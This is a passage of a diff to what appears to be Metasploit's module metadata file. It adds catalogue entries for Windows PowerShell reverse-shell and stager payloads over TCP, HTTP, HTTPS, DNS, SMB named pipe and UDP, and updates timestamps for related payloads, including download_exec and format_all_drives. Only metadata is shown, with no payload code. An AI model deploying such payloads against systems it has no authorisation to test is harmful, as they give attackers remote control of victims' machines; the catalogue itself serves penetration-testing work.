+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "scriptjunkie <scriptjunkie@scriptjunkie.us>",
+      "bannedit <bannedit@metasploit.com>",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_hop_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_http": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (wininet)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_http_proxy_pstore": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse HTTP Stager Proxy",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_http_proxy_pstore",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_http_proxy_pstore",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_https": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_https_proxy": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_https_proxy",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "corelanc0d3r <peter.ve@corelan.be>",
+      "amaloteaux <alex_maloteaux@metasploit.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP using SSL with custom proxy support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_https_proxy",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_ipv6_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (IPv6)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker over IPv6",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_named_pipe": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_nonx_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (No NX or Win7)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_nonx_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "vlad902 <vlad902@gmail.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker (No NX)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_nonx_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_ord_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_ord_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "spoonm <spoonm@no$email.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_ord_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_tcp": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_tcp_allports": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse All-Port TCP Stager",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_allports",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_tcp_allports",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_tcp_dns": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (DNS)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_dns",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "RageLtMan"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_tcp_dns",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_tcp_rc4": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_tcp_rc4_dns": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_rc4_dns",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_tcp_rc4_dns",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_tcp_uuid": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse TCP Stager with UUID Support",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "OJ Reeves"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_udp": {
+    "name": "Powershell Exec, Windows shellcode stage, Reverse UDP Stager with UUID Support",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_udp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_udp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_winhttp": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_winhttp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_winhttp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_cmd/windows/powershell/custom/reverse_winhttps": {
+    "name": "Powershell Exec, Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)",
+    "fullname": "payload/cmd/windows/powershell/custom/reverse_winhttps",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/custom/reverse_winhttps",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "payload_cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp": {
    "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager",
    "fullname": "payload/cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp",
@@ -170477,7 +173697,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp",
@@ -170516,7 +173736,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_tcp",
@@ -170554,7 +173774,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp",
@@ -170593,7 +173813,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid",
@@ -170630,7 +173850,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_named_pipe",
@@ -170667,7 +173887,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_nonx_tcp",
@@ -170705,7 +173925,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_tcp",
@@ -170745,7 +173965,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_rc4",
@@ -170783,7 +174003,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_uuid",
@@ -170820,7 +174040,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/find_tag",
@@ -170859,7 +174079,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_hop_http",
@@ -170896,7 +174116,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_http",
@@ -170933,7 +174153,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_http_proxy_pstore",
@@ -170971,7 +174191,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_ipv6_tcp",
@@ -171008,7 +174228,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_nonx_tcp",
@@ -171045,7 +174265,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_ord_tcp",
@@ -171083,7 +174303,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp",
@@ -171121,7 +174341,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_allports",
@@ -171160,7 +174380,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_dns",
@@ -171200,7 +174420,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4",
@@ -171240,7 +174460,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns",
@@ -171278,7 +174498,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_uuid",
@@ -171316,7 +174536,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_winhttp",
@@ -171351,7 +174571,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dns_txt_query_exec",
@@ -171386,7 +174606,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/download_exec",
@@ -171422,7 +174642,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/exec",
@@ -171459,7 +174679,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/format_all_drives",
